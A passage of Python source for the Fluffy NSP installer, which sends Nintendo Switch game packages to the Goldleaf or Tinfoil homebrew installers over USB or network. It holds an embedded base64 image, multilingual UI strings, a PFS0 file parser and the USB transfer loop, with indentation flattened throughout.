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'
class TransferRates:
Safe = 0x1F4
Normal = 0x100000
TransferRateDict = {0: TransferRates.Safe,
1: TransferRates.Normal}
# "Language!" -Cap, May 1st 2015
def set_language(v):
global language
language = v
if v == 0:
Language.CurrentDict = Language.EnglishDict
elif v == 1:
Language.CurrentDict = Language.ChineseDict
elif v == 2:
Language.CurrentDict = Language.VietDict
elif v == 3:
Language.CurrentDict = Language.TurkishDict
elif v == 4:
Language.CurrentDict = Language.BrazilianDict
elif v == 5:
Language.CurrentDict = Language.ItalianDict
elif v == 6:
Language.CurrentDict = Language.FrenchDict
elif v == 7:
Language.CurrentDict = Language.SpanishDict
elif v == 8:
Language.CurrentDict = Language.GermanDict
class Language:
CurrentDict = None
EnglishDict = {0: "Fluffy",
1: "Begin Transfer",
2: "Switch IP",
3: "This Computer's IP",
4: "USB Transfer Mode",
5: "Normal Mode",
6: "Safe Mode",
7: "Current NSP",
8: "Successfully Installed",
9: "Awaiting Selection",
10: "Switch Not Detected",
11: "Switch Detected",
12: "Network Mode",
13: "NSP Selection",
14: "NSP(s) Selected",
15: "Awaiting Connection Request",
16: "Cancel",
17: "Error: Goldleaf threw an exception.",
18: "Error: Tinfoil threw an exception.",
19: "Error: Network threw an exception.",
20: "Dark Mode",
21: "Options",
22: "Language",
23: "Github",
24: "Network",
25: "Headers Sent",
26: "NSP(s) in Queue",
27: "Installing",
28: "Transfer Rate",
29: "Current NCA",
}
ChineseDict = {0: "Fluffy 卷卷安装器",
1: "开始传输",
2: "Switch的IP地址",
3: "此电脑的IP地址",
4: "USB传输模式",
5: "正常模式",
6: "安全模式",
7: "当前的NSP游戏文件",
8: "成功安装",
9: "等待选择",
10: "Switch没有连接",
11: "Switch已连接",
12: "网络模式",
13: "选择NSP游戏文件",
14: "个NSP游戏文件 已选择",
15: "等待连接",
16: "取消",
17: "错误: Goldleaf 反馈了一个异常.",
18: "错误: Tinfoil 反馈了一个异常.",
19: "错误: 网络状态 反馈了一个异常.",
20: "黑暗模式",
21: "选项",
22: "语言切换",
23: "Github主页地址",
24: "网络",
25: "发送NSP头文件",
26: "个NSP游戏文件 在队列中",
27: "NSP游戏文件 安装中",
28: "传输速率",
29: "当前的NCA游戏文件包",
}
VietDict = { 0: "Fluffy",
1: "Bắt Đầu Chuyển",
2: "IP Của Switch",
3: "IP Của Máy Vi Tính",
4: "Tốc Độ USB",
5: "Tốc Độ Bình Thường",
6: "Tốc Độ Chậm",
7: "Đang Chuyển NSP",
8: "Tải Xông",
9: "Hãy Chọn NSP Của Bạn",
10: "Không Thể Tìm Thấy Switch Của Bạn",
11: "Tìm Được Switch Của Bạn",
12: "Bạn Đã Chọn Chuyển Bằng Wi-Fi",
13: "Xin Vui Lòng Chọn NSP",
14: "Cái NSP(s) Đã Được Chọn",
15: "Đang Chờ Yêu Cầu Kết Nối",
16: "Hủy Bỏ",
17: "Error: Goldleaf ngừng hoạt động.",
18: "Error: Tinfoil ngừng hoạt động.",
19: "Error: Network ngừng hoạt động.",
20: "Hình Tối",
21: "Sự Lựa Chọn",
22: "Ngôn Ngữ",
23: "Github",
24: "Network",
25: "Danh Sách NSP Đã Gởi Cho Bạn",
26: "Đang Chờ Chuyển NSP(s)",
27: "Đang Tải",
28: "Tốc Độ",
29: "Đang Chuyển NCA",
}
BrazilianDict = {0: "Fluffy",
1: "INICIAR TRANSFERÊNCIA",
2: "IP do Switch",
3: "IP deste computador",
4: "Modo de transferência USB",
5: "Modo normal",
6: "Modo seguro",
7: "NSP atual",
8: "Instalado com sucesso",
9: "Aguardando seleção",
10: "Switch não detectado",
11: "Switch detectado",
12: "Modo de rede",
13: "Selecione o NSP",
14: "NSP(s) selecionados",
15: "Aguardando pedido de conexão",
16: "CANCELAR",
17: "Erro: Problema reportado pelo Goldleaf.",
18: "Erro: Problema reportado pelo Tinfoil.",
19: "Erro: Problema reportado pela rede.",
20: "Tema escuro",
21: "Opções",
22: "Língua",
23: "Github",
24: "Rede",
25: "Cabeçalho enviado",
26: "NSP(s) em fila",
27: "Instalando",
28: "Velocidade de transferência",
29: "NCA atual",
}
ItalianDict = {0: "Fluffy",
1: "Inizia Trasferimento",
2: "IP della Switch",
3: "IP di questo Computer",
4: "Trasferimento USB",
5: "Modalità Normale",
6: "Modalità Sicura",
7: "NSP Corrente",
8: "Installazione Avvenuta con Successo",
9: "In attesa di selezione",
10: "Switch Non Rilevata",
11: "Switch Rilevata",
12: "Modalità Network",
13: "Seleziona NSP",
14: "NSP(s) Selezionato(i)",
15: "In Attesa di Richiesta di Connessione",
16: "Annulla",
17: "Errore: Goldleaf ha lanciato una eccezione.",
18: "Errore: Tinfoil ha lanciato una eccezione.",
19: "Errore: eccezione nella Modalità Network.",
20: "Dark Mode",
21: "Opzioni",
22: "Lingua",
23: "Github",
24: "Network",
25: "Headers Inviati",
26: "NSP(s) in Coda",
27: "Installazione in Corso",
28: "Velocità di Trasferimento",
29: "NCA Corrente",
}
TurkishDict = {0: "Fluffy",
1: "Aktarmaya Başla",
2: "Switch IP 'si",
3: "Bu bilgisayarın IP 'si",
4: "USB Transfer Modu",
5: "Normal Mod",
6: "Güvenli Mod",
7: "Şu anki NSP",
8: "Başarıyla Yüklendi",
9: "Seçim Bekleniyor",
10: "Switch Algılanamadı",
11: "Switch Algılandı",
12: "Ağ Modu",
13: "NSP Seçimi",
14: "NSP(ler) Seçildi",
15: "Bağlantı İsteği Bekleniyor",
16: "İptal",
17: "Hata: Goldleaf 'te sıradışı durum oluştu.",
18: "Hata: Tinfoil 'de sıradışı durum oluştu.",
19: "Hata: Ağda sıradışı durum oluştu.",
20: "Karanlık Mod",
21: "Ayarlar",
22: "Dil",
23: "Github",
24: "Ağ",
25: "Başlık Gönderildi",
26: "Sıradaki NSP(ler)",
27: "Yükleniyor",
28: "Aktarma Hızı",
29: "Şu anki NCA",
}
FrenchDict = {0: "Fluffy",
1: "Démarrer le Transfert",
2: "IP de la Switch",
3: "IP de l'Ordinateur",
4: "Mode de Transfert USB",
5: "Mode Normal",
6: "Mode Sûr",
7: "NSP Actuel",
8: "Installé Avec Succès",
9: "En Attente de Sélection",
10: "Switch Non Détecté",
11: "Switch Détecté",
12: "Mode Réseau",
13: "Ajouter NSP",
14: "NSP(s) Sélectionné(s)",
15: "En Attente de la Demande de Connection",
16: "Annuler",
17: "Erreur: Goldleaf a généré une exception.",
18: "Erreur: Tinfoil a généré une exception.",
19: "Erreur: Le réseau a généré une exception.",
20: "Mode Sombre",
21: "Options",
22: "Langue",
23: "Github",
24: "Réseau",
25: "En-têtes Envoyées",
26: "NSP(s) en File d'Attente",
27: "En Cours d'Installation",
28: "Débit",
29: "NCA Actuel",
}
SpanishDict = {0: "Fluffy",
1: "Iniciar la Transferencia",
2: "IP de la Switch",
3: "IP del Ordenador",
4: "Modo de Transferencia USB",
5: "Modo Normal",
6: "Modo Seguro",
7: "NSP Actual",
8: "Instalado Con Éxito",
9: "Esperando Selección",
10: "Switch No Detectada",
11: "Switch Detectada",
12: "Modo Red",
13: "Añadir NSP",
14: "NSP(s) Seleccionado(s)",
15: "Esperando la Solicitud de Conexión",
16: "Cancelar",
17: "Error: Goldleaf ha generado una excepción.",
18: "Error: Tinfoil ha generado une excepción.",
19: "Error: El red ha generado une excepción.",
20: "Modo Oscuro",
21: "Opciones",
22: "Idioma",
23: "Github",
24: "Red",
25: "Cabeceras Enviadas",
26: "NSP(s) en la Cola",
27: "Instalando",
28: "Velocidad",
29: "NCA Actual",
}
GermanDict = {0: "Fluffy",
1: "Übertragung starten",
2: "Switch-IP-Adresse",
3: "Computer-IP-Adresse",
4: "USB-Übertragungsmodus",
5: "Normaler Modus",
6: "Sicherer Modus",
7: "Momentane NSP",
8: "Erfolgreich installiert",
9: "Warte auf Auswahl",
10: "Keine Switch erkannt",
11: "Switch erkannt",
12: "Netzwerk-Modus",
13: "NSP-Auswahl",
14: "NSP(s) ausgewählt",
15: "Warte auf Verbindung",
16: "Abbrechen",
17: "Goldleaf-Fehler!",
18: "Tinfoil-Fehler!",
19: "Netzwerk-Fehler!",
20: "Dunkles Design",
21: "Einstellungen",
22: "Sprache",
23: "GitHub",
24: "Netzwerk",
25: "Header gesendet",
26: "NSP(s) in Warteschlange",
27: "Installiere",
28: "Transferrate",
29: "Momentane NCA",
}
set_language(language)
# End Language
# Setters
def set_dark_mode(v):
global dark_mode
if v == 0:
import qdarkstyle
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
dark_mode = 0
l_github.setStyleSheet("QLabel { color: rgba(255, 255, 255, 50%) }")
pixmap = QPixmap(dinlaypixmap)
screen = app.primaryScreen()
if screen.size().width() <= 2560:
if screen.size().width() <= 1920:
if screen.size().width() <= 1366:
lowresfix = pixmap.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(350, 240, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
img_label.setPixmap(pixmap)
else:
dark_mode = 1
pixmap = QPixmap(inlaypixmap)
screen = app.primaryScreen()
app.setStyleSheet("")
l_github.setStyleSheet("QLabel { color: rgba(0, 0, 0, 50%) }")
if screen.size().width() <= 2560:
if screen.size().width() <= 1920:
if screen.size().width() <= 1366:
lowresfix = pixmap.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
lowresfix = pixmap.scaled(350, 240, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
else:
img_label.setPixmap(pixmap)
def turn_off_logging():
global is_logging
is_logging = False
def set_nca_name(v):
global cur_nca_name
cur_nca_name = v
def set_start_time():
global start_time
start_time = time.time()
def set_cur_transfer_rate(v):
global cur_transfer_rate
cur_transfer_rate = v
def set_sent_header():
global sent_header
sent_header = True
def set_last_transfer_rate(v):
global last_transfer_rate
last_transfer_rate = v
def close_program():
global is_exiting
try:
configp = configparser.ConfigParser()
configp['DEFAULT'] = {'switch_ip': switch_ip,
'language': language,
'dark_mode': dark_mode}
with open(initial_dir + '/fluffy.conf', 'w') as cfgfile:
configp.write(cfgfile)
except:
pass
is_exiting = True
sys.exit()
def set_transfer_rate(v):
global transfer_rate
transfer_rate = TransferRateDict[v]
def set_dir(d):
global selected_dir
selected_dir = d
def set_selected_files(f):
global selected_files
selected_files = f
def set_progress(c, e):
global cur_progress
global end_progress
end_progress = e
cur_progress = c
def set_cur_nsp(nsp):
global cur_nsp_name
global cur_nsp_count
if cur_nsp_name != nsp:
if cur_nsp_name == "NA":
cur_nsp_name = nsp
else:
cur_nsp_count += 1
cur_nsp_name = nsp
set_start_time()
last_progress = 0
def set_total_nsp(n):
global total_nsp
total_nsp = n
def complete_install():
global is_done
is_done = True
def reset_install():
global is_installing
global sent_header
global is_done
global cur_progress
global end_progress
global cur_nsp_name
global cur_nca_name
global cur_transfer_rate
global last_transfer_rate
global max_nca_count
global selected_files
global selected_dir
global total_nsp
global cur_nsp_count
list_nsp.clear()
btn_header.setEnabled(True)
btn_nsp.setEnabled(True)
combo.setEnabled(True)
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
net_radio.setEnabled(True)
usb_radio.setEnabled(True)
txt_port.setEnabled(True)
tin_radio.setEnabled(True)
gold_radio.setEnabled(True)
l_nsp.setText("")
l_nsp.setStyleSheet("")
l_switch.setText("")
l_switch.setStyleSheet("")
l_status.setStyleSheet("")
progressbar.setValue(0)
cur_nsp_count = 1
total_nsp = 0
selected_files = None
selected_dir = None
cur_nca_count = 0
max_nca_count = 0
cur_nsp_name = "NA"
cur_nca_name = "NA"
cur_transfer_rate = 0
last_transfer_rate = 0
is_done = False
is_installing = False
sent_header = False
cur_progress = 0
end_progress = 100
init_language()
window.menuBar().setEnabled(True)
if is_network:
net_radio_cmd()
else:
usb_radio_cmd()
def throw_error(_type):
global last_error
if _type == 0:
last_error = Language.CurrentDict[17] # Goldleaf
elif _type == 1:
last_error = Language.CurrentDict[19] # Network
elif _type == 2:
last_error = Language.CurrentDict[18] # Tinfoil
def reset_last_error():
global last_error
last_error = "NA"
def complete_loading():
global is_installing
is_installing = True
def set_network(v):
global is_network
is_network = v
def set_ip(v, n):
global switch_ip
global host_ip
if n == 0:
switch_ip = v
else:
host_ip = v
def set_port(v):
global net_port
net_port = int(v)
def set_nca_count(c, m):
global cur_nca_count
global max_nca_count
cur_nca_count = c
max_nca_count = m
def set_goldleaf(v):
global is_goldleaf
is_goldleaf = v
# PFS0 & Goldleaf by fourminute.
class PFS0:
magic = None
total_files = None
string_table = None
header_remainder = None
body_length = None
file_array = []
f = None
file_names = []
@staticmethod
def reset():
PFS0.magic = None
PFS0.total_files = None
PFS0.string_table = None
PFS0.header_remainder = None
PFS0.body_length = None
PFS0.file_array = []
PFS0.f = None
PFS0.file_names = []
@staticmethod
def open(fn):
PFS0.f = open(fn, 'rb')
PFS0.f.seek(0)
PFS0.magic = PFS0.f.read(4).decode()
if PFS0.magic != 'PFS0':
print("PFS0 didn't check out. Possible NSP corruption.")
PFS0.total_files = struct.unpack("<I",PFS0.f.read(4))[0]
PFS0.header_remainder = struct.unpack("<I",PFS0.f.read(4))[0]
PFS0.string_table = 0x10 + 0x18 * PFS0.total_files
PFS0.f.read(4)
PFS0.file_array = []
for i in range(PFS0.total_files):
nca_offset = struct.unpack("<Q",PFS0.f.read(8))[0]
nca_size = struct.unpack("<Q",PFS0.f.read(8))[0]
name_offset= struct.unpack("<I",PFS0.f.read(4))[0]
PFS0.file_array.append((nca_offset,nca_size,name_offset))
PFS0.f.read(4)
PFS0.body_length = PFS0.f.tell() + PFS0.header_remainder
for i in range(PFS0.total_files):
PFS0.f.seek(PFS0.string_table+PFS0.file_array[i][2])
fn = b''
while True:
b = PFS0.f.read(1)
if b == b'\x00': break
fn += b
PFS0.file_names.append(fn.decode())
@staticmethod
def read_chunks(index):
global transfer_rate
global last_transfer_rate
chunk_size = transfer_rate
abs_sz = int(PFS0.file_array[index][1])
abs_off = int(PFS0.body_length+PFS0.file_array[index][0])
PFS0.f.seek(abs_off)
end = abs_off + abs_sz
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
to_read = end - PFS0.f.tell()
if to_read < chunk_size:
yield PFS0.f.read(to_read)
break
else:
yield PFS0.f.read(chunk_size)
set_progress(int(PFS0.f.tell()), abs_sz)
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(PFS0.f.tell()) - last_transfer_rate)
set_last_transfer_rate(int(PFS0.f.tell()))
set_start_time()
@staticmethod
def read_nca(index):
PFS0.f.seek(PFS0.body_length+PFS0.file_array[index][0])
return PFS0.f.read(PFS0.file_array[index][1])
class CommandId:
ConnectionRequest = 0
ConnectionResponse= 1
NSPName= 2
Start= 3
NSPData= 4
NSPContent= 5
NSPTicket= 6
Finish= 7
class Goldleaf:
GLUC = 0x43554c47
magic = 0x43554c47
ticket_index = 0
cmd_id = 0
nsp_path = ""
@staticmethod
def reset():
Goldleaf.GLUC = 0x43554c47
Goldleaf.magic = 0x43554c47
Goldleaf.ticket_index = 0
Goldleaf.cmd_id = 0
Goldleaf.nsp_path = ""
@staticmethod
def write(buffer):
gold_out.write(buffer)
@staticmethod
def magic_ok():
return Goldleaf.GLUC == Goldleaf.magic
@staticmethod
def is_id(a_cmd):
return a_cmd == Goldleaf.cmd_id
@staticmethod
def read(length):
return gold_in.read(length).tobytes()
@staticmethod
def read_cmd(data):
Goldleaf.magic,Goldleaf.cmd_id = struct.unpack("<II",data)
@staticmethod
def write_cmd(a_cmd):
packed = struct.pack("<II",Goldleaf.magic,a_cmd)
gold_out.write(bytes(packed))
@staticmethod
def Goldleaf_USB():
Goldleaf.write_cmd(CommandId.ConnectionRequest)
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
try:
Goldleaf.read_cmd(Goldleaf.read(8))
if Goldleaf.is_id(CommandId.ConnectionResponse) and Goldleaf.magic_ok():
Goldleaf.write_cmd(CommandId.NSPName)
base_name = os.path.basename(Goldleaf.nsp_path)
Goldleaf.write(struct.pack("<I",len(base_name)))
Goldleaf.write(base_name.encode())
elif Goldleaf.is_id(CommandId.Start) and Goldleaf.magic_ok():
Goldleaf.write_cmd(CommandId.NSPData)
PFS0.open(Goldleaf.nsp_path)
Goldleaf.write(struct.pack("<I",len(PFS0.file_array)))
for i in range(len(PFS0.file_array)):
Goldleaf.write(struct.pack("<I",len(PFS0.file_names[i])))
Goldleaf.write(PFS0.file_names[i].encode())
Goldleaf.write(struct.pack("<Q",PFS0.body_length+PFS0.file_array[i][0]))
Goldleaf.write(struct.pack("<Q",PFS0.file_array[i][1]))
if '.tik' in PFS0.file_names[i].lower():
Goldleaf.ticket_index = i
complete_loading()
elif Goldleaf.is_id(CommandId.NSPContent) and Goldleaf.magic_ok():
index = struct.unpack("<I", Goldleaf.read(4))[0]
try:
set_nca_name(PFS0.file_names[index])
set_nca_count(index+1, len(PFS0.file_array))
except:
pass
for buffer in PFS0.read_chunks(index):
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
try:
Goldleaf.write(buffer)
break
except:
pass
elif Goldleaf.is_id(CommandId.NSPTicket) and Goldleaf.magic_ok():
while True:
try:
Goldleaf.write(PFS0.read_nca(Goldleaf.ticket_index))
break
except:
pass
elif Goldleaf.is_id(CommandId.Finish) and Goldleaf.magic_ok():
set_progress(100,100)
complete_install()
sys.exit()
except:
pass
return 0
def init_goldleaf_usb_install():
global gold_in
global gold_out
Goldleaf.reset()
PFS0.reset()
for file in selected_files:
try:
dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
dev.reset()
dev.set_configuration()
cfg = dev.get_active_configuration()
is_out_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_OUT
is_in_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_IN
gold_out = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_out_ep)
